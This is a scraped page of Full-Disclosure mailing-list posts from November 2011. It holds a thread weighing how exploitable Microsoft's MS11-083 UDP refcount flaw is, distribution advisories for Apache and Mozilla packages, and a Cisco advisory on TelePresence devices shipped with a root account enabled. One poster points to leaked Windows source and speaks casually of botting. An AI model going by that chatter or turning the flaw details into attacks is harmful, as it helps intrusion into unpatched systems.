Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

[xD 0x41]

You could just google for IRC packs of win2k src ;)
I know i have a copy of it somewhere... acvtually tho, would not be
helpful tho, as it does not affect win2k.. so i guess there would be
some code there but not the code you want.

@george
and, ideally if 'years' ago existed for this exploit but, it does only
affect v6 and up , this is tested so xp/2k/2k3 not affected...
still, i know people are using other ways anyhow , and thats just how
botting is... one way dies, one takes its place :s
i guess we wait for the rls of this.. maybe!


On 10 November 2011 01:51, Darren Martyn
 wrote:
> Oddly enough, I was aware the kernel has to handle packets sent to "closed"
> ports, just was not thinking of HOW it handles them. I would love to see the
> code for that, and am planning to look at the same code on Linux so I can
> see exactly what the hell it does.
>
> On Wed, Nov 9, 2011 at 1:56 PM, Georgi Guninski 
> wrote:
>>
>> On Tue, Nov 08, 2011 at 11:53:52PM +0200, Henri Salo wrote:
>> > http://technet.microsoft.com/en-us/security/bulletin/ms11-083
>> >
>> > "The vulnerability could allow remote code execution if an attacker
>> > sends a continuous flow of specially crafted UDP packets to a closed port 
>> > on
>> > a target system."
>> >
>> > Microsoft did it once again.
>> >
>> > - Henri Salo
>> >
>>
>> Imagine if you knew about this a few years ago...
>>
>> --
>> j
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> --
> My Homepage :D
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2011:168 ] apache

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:168
 http://www.mandriva.com/security/
 ___

 Package : apache
 Date: November 9, 2011
 Affected: 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in apache:
 
 The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21,
 when used with mod_proxy_balancer in certain configurations, allows
 remote attackers to cause a denial of service (temporary error state
 in the backend server) via a malformed HTTP request (CVE-2011-3348).
 
 The fix for CVE-2011-3192 provided by the MDVSA-2011:130 advisory
 introduced regressions in the way httpd handled certain Range HTTP
 header values.
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3348
 https://issues.apache.org/bugzilla/show_bug.cgi?id=51878
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 efa3019014628e3c480750c1f2004a7c  
2010.1/i586/apache-base-2.2.15-3.5mdv2010.2.i586.rpm
 3087616095041b2a0ec35a4f07b0db39  
2010.1/i586/apache-devel-2.2.15-3.5mdv2010.2.i586.rpm
 f64f79810c740c6ea48a62b6efaa2e57  
2010.1/i586/apache-htcacheclean-2.2.15-3.5mdv2010.2.i586.rpm
 54193e742de9f3c09033686110dbcf12  
2010.1/i586/apache-mod_authn_dbd-2.2.15-3.5mdv2010.2.i586.rpm
 5190c0b547fdabd83f11f2c0b3c4c59c  
2010.1/i586/apache-mod_cache-2.2.15-3.5mdv2010.2.i586.rpm
 797c23a6d7bd773b56f12ef80e598bd3  
2010.1/i586/apache-mod_dav-2.2.15-3.5mdv2010.2.i586.rpm
 2489ede1721764643b2942292de4e43a  
2010.1/i586/apache-mod_dbd-2.2.15-3.5mdv2010.2.i586.rpm
 32132cdd5a453e1d35b34ad86756469b  
2010.1/i586/apache-mod_deflate-2.2.15-3.5mdv2010.2.i586.rpm
 bb94bf4569a6979b23bbf29e51172deb  
2010.1/i586/apache-mod_disk_cache-2.2.15-3.5mdv2010.2.i586.rpm
 c0465fd2bf450d8229c92ebd7b96e796  
2010.1/i586/apache-mod_file_cache-2.2.15-3.5mdv2010.2.i586.rpm
 8fe0536c0567db805b18eee9b6fbae4c  
2010.1/i586/apache-mod_ldap-2.2.15-3.5mdv2010.2.i586.rpm
 f9f7679d70d4c06573737e401c9efa56  
2010.1/i586/apache-mod_mem_cache-2.2.15-3.5mdv2010.2.i586.rpm
 bb61c23cadc265c1182e4d08beaf6834  
2010.1/i586/apache-mod_proxy-2.2.15-3.5mdv2010.2.i586.rpm
 724885ee3820d7b0ae7c20a188fb8c54  
2010.1/i586/apache-mod_proxy_ajp-2.2.15-3.5mdv2010.2.i586.rpm
 2582960ff8ed44b516dba77a8ca3f79e  
2010.1/i586/apache-mod_proxy_scgi-2.2.15-3.5mdv2010.2.i586.rpm
 54829077b157f55baa47bcb05769c039  
2010.1/i586/apache-mod_reqtimeout-2.2.15-3.5mdv2010.2.i586.rpm
 2e977bb1f6a182a2c70912167265ce50  
2010.1/i586/apache-mod_ssl-2.2.15-3.5mdv2010.2.i586.rpm
 a5bf2b114ee2d72336adce28811c3037  
2010.1/i586/apache-modules-2.2.15-3.5mdv2010.2.i586.rpm
 83b2206a476ef960dd2267e42b2121af  
2010.1/i586/apache-mod_userdir-2.2.15-3.5mdv2010.2.i586.rpm
 e5c81b0d5dee76dfe644188c719208fd  
2010.1/i586/apache-mpm-event-2.2.15-3.5mdv2010.2.i586.rpm
 1f565927f0329db6a6dcbfc146862d7d  
2010.1/i586/apache-mpm-itk-2.2.15-3.5mdv2010.2.i586.rpm
 9fe74c5aa75109bd04e60278d3ce4f27  
2010.1/i586/apache-mpm-peruser-2.2.15-3.5mdv2010.2.i586.rpm
 3a253e811772ae2eeed3ed028bb05dec  
2010.1/i586/apache-mpm-prefork-2.2.15-3.5mdv2010.2.i586.rpm
 ada4b77b392aa8a5b6c283d1d3394f19  
2010.1/i586/apache-mpm-worker-2.2.15-3.5mdv2010.2.i586.rpm
 f777f009148573676e3bda6fa9d3472a  
2010.1/i586/apache-source-2.2.15-3.5mdv2010.2.i586.rpm 
 30b49a94b9485639515c5323a58a87b2  
2010.1/SRPMS/apache-2.2.15-3.5mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 904ac3e39e1544ac03201c638f272461  
2010.1/x86_64/apache-base-2.2.15-3.5mdv2010.2.x86_64.rpm
 48164409c194bc836764f105d332b9b2  
2010.1/x86_64/apache-devel-2.2.15-3.5mdv2010.2.x86_64.rpm
 7f9ba9d3b24e352fd9c6dbb770d1c0e2  
2010.1/x86_64/apache-htcacheclean-2.2.15-3.5mdv2010.2.x86_64.rpm
 bfc5629f34ceec77cc9f63cbacedec8b  
2010.1/x86_64/apache-mod_authn_dbd-2.2.15-3.5mdv2010.2.x86_64.rpm
 e4f47be08c6bf1e1e12f8f8263014238  
2010.1/x86_64/apache-mod_cache-2.2.15-3.5mdv2010.2.x86_64.rpm
 01f8ba996efc43df6e94cf3ba7b960ee  
2010.1/x86_64/apache-mod_dav-2.2.15-3.5mdv2010.2.x86_64.rpm
 07b4081d62a107a075f1b2e13a505496  
2010.1/x86_64/apache-mod_dbd-2.2.15-3.5mdv2010.2.x86_64.rpm
 42dc96e272815486f57db1fc5b5006c3  
2010.1/x86_64/apache-mod_deflate-2.2.15-3.5mdv2010.2.x86_64.rpm
 5ab4bcddcd345aee9938a53f8c66f652  
2010.1/x86_64/apache-mod_disk_cache-2.2.15-3.5mdv2010.2.x86_64.rpm
 8bc139a4c4ce0381292885d35e0dc9a8  
2010.1/x86_64/apache-mod_file_cache-2.2.15-3.5mdv2010.2.x86_64.rpm
 d7add6101b8b2393c9e16bbe4570e474  
2010.1/x86_64/apache-mod_ldap-2.2.15-3.5mdv2010.2.x86_64.rpm
 4276d115ba3061e90c55b3614fc094e9  
2010.1/x86_64/apache

[Full-disclosure] [SECURITY] [DSA 2342-1] iceape security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2342-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
November 09, 2011  http://www.debian.org/security/faq
- -

Package: iceape
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-3647 CVE-2011-3648 CVE-2011-3650 

Several vulnerabilities have been found in the Iceape internet suite, an
unbranded version of Seamonkey:

CVE-2011-3647

   "moz_bug_r_a4" discovered a privilege escalation vulnerability in
   addon handling.

CVE-2011-3648

   Yosuke Hasegawa discovered that incorrect handling of Shift-JIS 
   encodings could lead to cross-site scripting.

CVE-2011-3650

   Marc Schoenefeld discovered that profiling the Javascript code
   could lead to memory corruption.

The oldstable distribution (lenny) is not affected. The iceape package only
provides the XPCOM code.

For the stable distribution (squeeze), this problem has been fixed in
version 2.0.11-9.

For the unstable distribution (sid), this problem has been fixed in
version 2.0.14-9.

We recommend that you upgrade your iceape packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk66tBAACgkQXm3vHE4uylq1UwCgiDFB6+fSacdq2NSfFdRlxPmL
LRAAnRSQRBdqlERh/5aQLQOj+tTpEdSX
=kBkz
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2341-1] iceweasel security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2341-1   secur...@debian.org
http://www.debian.org/security/Moritz Muehlenhoff
November 09, 2011  http://www.debian.org/security/faq
- -

Package: iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-3647 CVE-2011-3648 CVE-2011-3650 

Several vulnerabilities have been discovered in Iceweasel, a web browser
based on Firefox. The included XULRunner library provides rendering
services for several other applications included in Debian.

CVE-2011-3647

   "moz_bug_r_a4" discovered a privilege escalation vulnerability in
   addon handling.

CVE-2011-3648

   Yosuke Hasegawa discovered that incorrect handling of Shift-JIS 
   encodings could lead to cross-site scripting.

CVE-2011-3650

   Marc Schoenefeld discovered that profiling the Javascript code
   could lead to memory corruption.

For the oldstable distribution (lenny), this problem has been fixed in
version 1.9.0.19-15 of the xulrunner source package.

For the stable distribution (squeeze), this problem has been fixed in
version 3.5.16-11.

For the unstable distribution (sid), this problem has been fixed in
version 8.0-1.

We recommend that you upgrade your iceweasel packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk66rcYACgkQXm3vHE4uylqo9QCgsdGqCrDS99Eqo1QHA3G/LyMP
/aQAoMGeYFbcebA+ulmKJi94hEYrnLql
=H/MJ
-END PGP SIGNATURE-





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

[Henri Salo]

On Wed, Nov 09, 2011 at 06:45:59AM -0500, Dan Rosenberg wrote:
> People seem incredulous that the bug can be triggered by sending
> traffic to closed ports.  Keep in mind that the only way your
> networking stack knows to reject packets that are directed towards
> closed ports is to do some preliminary parsing of those packets,
> namely allocating some control structures, receiving at least the
> physical/link layer frame, IP header, and transport layer header, and
> parsing out the port and destination address.  There's plenty of
> things that can go wrong before the kernel decides "this is for a port
> that's not open" and drops it, which appears to be what happened here.
>  Doesn't make the bug any less terrible, but it's not quite as
> surprising as people seem to think.

I am surprised about this, because Microsoft is definately lagging some level 
of testing and change management in critical code. How many servers are people 
using without networking these days. We do talk about remote execution 
vulnerable in something, which obviously might get unnoticed when we think of 
security audits, PCI and such. I wonder if integrated firewall in Windows could 
block this as Microsoft should do everything in their power to stop attacks in 
this security vulnerability.

Related picture: http://paste.nerv.fi/72975464-itbegins.jpeg

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cisco Security Advisory: Cisco TelePresence System Integrator C Series and Cisco TelePresence EX Series Device Default Root Account Manufacturing Error

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco TelePresence System Integrator C Series and Cisco TelePresence EX Series 
Device Default Root Account Manufacturing Error

Advisory ID: cisco-sa-2009-telepresence-c-ex-series

Revision 1.0

For Public Release 2011 November 9 16:00  UTC (GMT)
+-

Summary
===

Software that runs on Cisco TelePresence System Integrator C Series
and Cisco TelePresence EX Series devices was updated to include secure
default configurations beginning with the TC4.0 release. This change
was accompanied by the release of Cisco Security Advisory
cisco-sa-20110202-tandberg.

Due to a manufacturing error, Cisco TelePresence System Integrator C
Series and Cisco TelePresence EX Series devices that were distributed
between November 18th, 2010 and September 19th, 2011 may have the root
account enabled.

Information on how to identify affected devices is available in the
Details section of this advisory.

Information on how to remediate this issue is available in the
Workarounds section of this advisory.

This advisory is posted at:
 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-2009-telepresence-c-ex-series

Affected Products
=

The following products are only affected if they were distributed
between November 18th, 2010 and September 19th, 2011 with software
release TC4.0, TC4.1, or TC4.2.

 

Vulnerable Products
+--

All Cisco TelePresence System Integrator C Series, Cisco TelePresence
EX Series, and Cisco TelePresence Quick Set products that were
distributed within the designated timeframe are potentially affected.
Administrators can determine the status of their device by using the
Serial Number Validator located at the following link:
http://serialnumbervalidation.com/PSIRT-20111026

The Serial Number Validator tool will indicate if the device was
affected when the product was shipped. If a factory reset or software
upgrade occurred or certain manual configuration changes were made,
the device may not be affected. 

Products Confirmed Not Vulnerable
+

Cisco TelePresence System Integrator C Series and Cisco TelePresence
EX Series devices that were distributed prior to November 18th, 2010
or after September 19th, 2011 are not affected by this vulnerability.
No other Cisco products are currently known to be affected.

Details
===

Cisco TelePresence System Integrator C Series and Cisco TelePresence
EX Series devices bring an immersive, interactive, and engaging
experience to person-to-person or group telepresence calls.

Default Root Account
+---

As the result of an error that occurred during the manufacturing and
distribution process, affected products may have been distributed with
an insecure configuration. The vulnerability is due to a failure to
return devices to default configurations after license/option
configuration and testing.

Affected devices may have the root account enabled and configured with
a well-known default password. This account is intended to be enabled
by device administrators when certain debugging actions need to be
performed and should be disabled by default.

Administrators may verify the configuration of affected devices by
using one of the following methods:

For devices that are running TC4.0 or 4.1 software, administrators may
view the serial number of an affected device by logging in to the
command line of an affected device with the admin account and issuing
the xstatus systemunit hardware command.

View Serial Number:
+--

ssh admin@203.113.55

Welcome to TANDBERG Codec Release TC4.1.0.247017 SW Release
Date: 2011-01-28

OK

systemtools xstatus producttype
*s SystemUnit Hardware Module SerialNumber: "ABC123456789"
*s SystemUnit Hardware Module Identifier: "05"
*s SystemUnit Hardware MainBoard SerialNumber: "ABC123456"
*s SystemUnit Hardware MainBoard Identifier: "101551-3 [05]"
*s SystemUnit Hardware BootSoftware: "U-Boot 2010.06-81"
** end

Determining the State of the Root Account:
+-

As the result of a functional defect that was introduced in software
release TC4.0, the systemtools rootsettings get command will always
return a value of off. To accurately determine the state of the root
account on devices that are running software release TC4.0 or TC4.1,
administrators should attempt to open an SSH connection to an affected
device as root.

Root Account Enabled:
+-

ssh root@203.0.113.55

[tandberg:~] $

Root Account Disabled:

ssh root@203.0.113.55

Password:
Password:
Password:

Permission denied (publickey,keyboard-interactive)

For devices that are running software release TC4.2, administrators
can view the serial number or status of the root accoun

[Full-disclosure] [ MDVSA-2011:168 ] apache

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:168
 http://www.mandriva.com/security/
 ___

 Package : apache
 Date: November 9, 2011
 Affected: 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in apache:
 
 The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21,
 when used with mod_proxy_balancer in certain configurations, allows
 remote attackers to cause a denial of service (temporary error state
 in the backend server) via a malformed HTTP request (CVE-2011-3348).
 
 The fix for CVE-2011-3192 provided by the MDVSA-2011:130 advisory
 introduced regressions in the way httpd handled certain Range HTTP
 header values.
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3348
 https://issues.apache.org/bugzilla/show_bug.cgi?id=51878
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 efa3019014628e3c480750c1f2004a7c  
2010.1/i586/apache-base-2.2.15-3.5mdv2010.2.i586.rpm
 3087616095041b2a0ec35a4f07b0db39  
2010.1/i586/apache-devel-2.2.15-3.5mdv2010.2.i586.rpm
 f64f79810c740c6ea48a62b6efaa2e57  
2010.1/i586/apache-htcacheclean-2.2.15-3.5mdv2010.2.i586.rpm
 54193e742de9f3c09033686110dbcf12  
2010.1/i586/apache-mod_authn_dbd-2.2.15-3.5mdv2010.2.i586.rpm
 5190c0b547fdabd83f11f2c0b3c4c59c  
2010.1/i586/apache-mod_cache-2.2.15-3.5mdv2010.2.i586.rpm
 797c23a6d7bd773b56f12ef80e598bd3  
2010.1/i586/apache-mod_dav-2.2.15-3.5mdv2010.2.i586.rpm
 2489ede1721764643b2942292de4e43a  
2010.1/i586/apache-mod_dbd-2.2.15-3.5mdv2010.2.i586.rpm
 32132cdd5a453e1d35b34ad86756469b  
2010.1/i586/apache-mod_deflate-2.2.15-3.5mdv2010.2.i586.rpm
 bb94bf4569a6979b23bbf29e51172deb  
2010.1/i586/apache-mod_disk_cache-2.2.15-3.5mdv2010.2.i586.rpm
 c0465fd2bf450d8229c92ebd7b96e796  
2010.1/i586/apache-mod_file_cache-2.2.15-3.5mdv2010.2.i586.rpm
 8fe0536c0567db805b18eee9b6fbae4c  
2010.1/i586/apache-mod_ldap-2.2.15-3.5mdv2010.2.i586.rpm
 f9f7679d70d4c06573737e401c9efa56  
2010.1/i586/apache-mod_mem_cache-2.2.15-3.5mdv2010.2.i586.rpm
 bb61c23cadc265c1182e4d08beaf6834  
2010.1/i586/apache-mod_proxy-2.2.15-3.5mdv2010.2.i586.rpm
 724885ee3820d7b0ae7c20a188fb8c54  
2010.1/i586/apache-mod_proxy_ajp-2.2.15-3.5mdv2010.2.i586.rpm
 2582960ff8ed44b516dba77a8ca3f79e  
2010.1/i586/apache-mod_proxy_scgi-2.2.15-3.5mdv2010.2.i586.rpm
 54829077b157f55baa47bcb05769c039  
2010.1/i586/apache-mod_reqtimeout-2.2.15-3.5mdv2010.2.i586.rpm
 2e977bb1f6a182a2c70912167265ce50  
2010.1/i586/apache-mod_ssl-2.2.15-3.5mdv2010.2.i586.rpm
 a5bf2b114ee2d72336adce28811c3037  
2010.1/i586/apache-modules-2.2.15-3.5mdv2010.2.i586.rpm
 83b2206a476ef960dd2267e42b2121af  
2010.1/i586/apache-mod_userdir-2.2.15-3.5mdv2010.2.i586.rpm
 e5c81b0d5dee76dfe644188c719208fd  
2010.1/i586/apache-mpm-event-2.2.15-3.5mdv2010.2.i586.rpm
 1f565927f0329db6a6dcbfc146862d7d  
2010.1/i586/apache-mpm-itk-2.2.15-3.5mdv2010.2.i586.rpm
 9fe74c5aa75109bd04e60278d3ce4f27  
2010.1/i586/apache-mpm-peruser-2.2.15-3.5mdv2010.2.i586.rpm
 3a253e811772ae2eeed3ed028bb05dec  
2010.1/i586/apache-mpm-prefork-2.2.15-3.5mdv2010.2.i586.rpm
 ada4b77b392aa8a5b6c283d1d3394f19  
2010.1/i586/apache-mpm-worker-2.2.15-3.5mdv2010.2.i586.rpm
 f777f009148573676e3bda6fa9d3472a  
2010.1/i586/apache-source-2.2.15-3.5mdv2010.2.i586.rpm 
 30b49a94b9485639515c5323a58a87b2  
2010.1/SRPMS/apache-2.2.15-3.5mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 904ac3e39e1544ac03201c638f272461  
2010.1/x86_64/apache-base-2.2.15-3.5mdv2010.2.x86_64.rpm
 48164409c194bc836764f105d332b9b2  
2010.1/x86_64/apache-devel-2.2.15-3.5mdv2010.2.x86_64.rpm
 7f9ba9d3b24e352fd9c6dbb770d1c0e2  
2010.1/x86_64/apache-htcacheclean-2.2.15-3.5mdv2010.2.x86_64.rpm
 bfc5629f34ceec77cc9f63cbacedec8b  
2010.1/x86_64/apache-mod_authn_dbd-2.2.15-3.5mdv2010.2.x86_64.rpm
 e4f47be08c6bf1e1e12f8f8263014238  
2010.1/x86_64/apache-mod_cache-2.2.15-3.5mdv2010.2.x86_64.rpm
 01f8ba996efc43df6e94cf3ba7b960ee  
2010.1/x86_64/apache-mod_dav-2.2.15-3.5mdv2010.2.x86_64.rpm
 07b4081d62a107a075f1b2e13a505496  
2010.1/x86_64/apache-mod_dbd-2.2.15-3.5mdv2010.2.x86_64.rpm
 42dc96e272815486f57db1fc5b5006c3  
2010.1/x86_64/apache-mod_deflate-2.2.15-3.5mdv2010.2.x86_64.rpm
 5ab4bcddcd345aee9938a53f8c66f652  
2010.1/x86_64/apache-mod_disk_cache-2.2.15-3.5mdv2010.2.x86_64.rpm
 8bc139a4c4ce0381292885d35e0dc9a8  
2010.1/x86_64/apache-mod_file_cache-2.2.15-3.5mdv2010.2.x86_64.rpm
 d7add6101b8b2393c9e16bbe4570e474  
2010.1/x86_64/apache-mod_ldap-2.2.15-3.5mdv2010.2.x86_64.rpm
 4276d115ba3061e90c55b3614fc094e9  
2010.1/x86_64/apache

Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

[Dan Dart]

> Joke: "Chuck Norris can exploit sockets that aren't even listening."

No... that's Bruce Schneier :P

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

[GomoR]

On Wed, Nov 09, 2011 at 06:45:59AM -0500, Dan Rosenberg wrote:
[..]
> While I'd love to see an exploit from a purely academic perspective,
> it doesn't appear that this is the type of bug where exploitation is
> going to be reliable enough to support a worm.  The reference counter
> in question is most likely 32 bits, but even giving the benefit of the
> doubt and saying it's a 16-bit refcount, that's still 2^16 events
> (probably receiving a certain UDP packet) that need to be triggered
> precisely in order to cause a refcount overflow and then trigger a
> remote kernel use-after-free condition, which wouldn't be trivial to
> exploit even by itself.  On an unreliable network like the Internet,
> it seems unlikely that the kind of traffic volume required to trigger
> this bug could be generated without dropping a single packet.
> Reliable DoS seems more likely though.

I would love to hear about results running this exploit/PoC/whatever 
against a xBSD TCP/IP stack.

Microsoft Windows TCP/IP stack looks so BSDish to me since Windows Vista.

But that's probably because they "rewrote" it completely at that 
time (with integration of their "new" IPv6 stack also).

Joke: "Chuck Norris can exploit sockets that aren't even listening."

-- 
  ^  ___  ___ http://www.GomoR.org/  <-+
  | / __ |__/Senior Security Engineer  |
  | \__/ |  \ ---[ zsh$ alias psed='perl -pe ' ]---|
  +-->  Net::Frame <=> http://search.cpan.org/~gomor/  <---+

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

[Darren Martyn]

Oddly enough, I was aware the kernel has to handle packets sent to "closed"
ports, just was not thinking of HOW it handles them. I would love to see
the code for that, and am planning to look at the same code on Linux so I
can see exactly what the hell it does.

On Wed, Nov 9, 2011 at 1:56 PM, Georgi Guninski wrote:

> On Tue, Nov 08, 2011 at 11:53:52PM +0200, Henri Salo wrote:
> > http://technet.microsoft.com/en-us/security/bulletin/ms11-083
> >
> > "The vulnerability could allow remote code execution if an attacker
> sends a continuous flow of specially crafted UDP packets to a closed port
> on a target system."
> >
> > Microsoft did it once again.
> >
> > - Henri Salo
> >
>
> Imagine if you knew about this a few years ago...
>
> --
> j
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
My Homepage :D 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] DC4420 - London DEFCON - November 2011 meet - Tuesday 15th November

[Major Malfunction]

Where:

   DOWNSTAIRS @ The Phoenix, Cavendish Square
   http://www.phoenixcavendishsquare.co.uk/

When:

  Tuesday 15th November, 2011
  17:30 until kicking out time

Why:

   Drinking and playing with awesome tech

Who:

   You
   Me
   THC (The Hackers Choice twitter:@hackerschoice)

What:

   THC are going to do a short talk about Enigma - they will be bringing 
a *real* Enigma machine with them

What else:

   More drinking

No really, what else:

   A shortish tech talk if someone gets one in to us in time

Greets:
MM
-- 
"In DEFCON, we have no names..." errr... well, we do... but silly ones...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

[Georgi Guninski]

On Tue, Nov 08, 2011 at 11:53:52PM +0200, Henri Salo wrote:
> http://technet.microsoft.com/en-us/security/bulletin/ms11-083
> 
> "The vulnerability could allow remote code execution if an attacker sends a 
> continuous flow of specially crafted UDP packets to a closed port on a target 
> system."
> 
> Microsoft did it once again.
> 
> - Henri Salo
>

Imagine if you knew about this a few years ago...

-- 
j

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

[Dave]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On 09/11/2011 11:45, Dan Rosenberg wrote:
> On Wed, Nov 9, 2011 at 6:25 AM, Darren Martyn
>  wrote:
>> Balls, I forgot to add this to the last message, but has anyone examined the
>> patch yet? I can only imagine it would be VERY interesting to look at...
>>  Or that it opens all UDP ports so that there are no closed ones to
>> exploit 
>>
> 
> Yet another bug class (refcount overflows) that the PaX Team
> eradicated years ago and everyone else is still scrambling to catch
> up.
> 
> People seem incredulous that the bug can be triggered by sending
> traffic to closed ports.  Keep in mind that the only way your
> networking stack knows to reject packets that are directed towards
> closed ports is to do some preliminary parsing of those packets,
> namely allocating some control structures, receiving at least the
> physical/link layer frame, IP header, and transport layer header, and
> parsing out the port and destination address.  There's plenty of
> things that can go wrong before the kernel decides "this is for a port
> that's not open" and drops it, which appears to be what happened here.
>  Doesn't make the bug any less terrible, but it's not quite as
> surprising as people seem to think.


Yes, I agree. The term "closed port" is somewhat misleading to those who have 
no idea of how a TCP/IP stack works.
What is surprising though is that this flaw exists in such a mature OS as 
Windows. But then again this is Microsoft we are talking about.




>> On Wed, Nov 9, 2011 at 11:22 AM, Darren Martyn
>>  wrote:
>>>
>>> So... Another Conficker type worm possible from this bug if everyone cocks
>>> up and fails to patch?
>>>
> 
> While I'd love to see an exploit from a purely academic perspective,
> it doesn't appear that this is the type of bug where exploitation is
> going to be reliable enough to support a worm.  The reference counter
> in question is most likely 32 bits, but even giving the benefit of the
> doubt and saying it's a 16-bit refcount, that's still 2^16 events
> (probably receiving a certain UDP packet) that need to be triggered
> precisely in order to cause a refcount overflow and then trigger a
> remote kernel use-after-free condition, which wouldn't be trivial to
> exploit even by itself.  On an unreliable network like the Internet,
> it seems unlikely that the kind of traffic volume required to trigger
> this bug could be generated without dropping a single packet.
> Reliable DoS seems more likely though.
> 
> -Dan
> 
>>> On Tue, Nov 8, 2011 at 10:10 PM, Nahuel Grisolia
>>>  wrote:

 Kingcope, where's the exploit?

 :P

 On Nov 8, 2011, at 6:53 PM, Henri Salo wrote:

> http://technet.microsoft.com/en-us/security/bulletin/ms11-083
>
> "The vulnerability could allow remote code execution if an attacker
> sends a continuous flow of specially crafted UDP packets to a closed port 
> on
> a target system."
>
> Microsoft did it once again.
>
> - Henri Salo
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>>
>>> --
>>> My Homepage :D
>>>
>>
>>
>>
>> --
>> My Homepage :D
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTrp77rIvn8UFHWSmAQLAoAf/SQFShTXjNjfclb73hs4z/RajsNJfzl5x
PIdT7N5q57Uzem1c7rvRoIPwF/Uv3wyL5qpyjq7USO4X/VhswlXgjVM022NPkCRE
uRV5/rES2lvBM7CVpJo/virO9qoKOs4VGzZK1GNbGyiE4PeCvzFZvyrtGHyEALc9
rDX00ZCo31O1xVP9M6X7g0il82x5LcDGpNQ5GZRFhpwfEkJeIZOIb80j90Y17Gu2
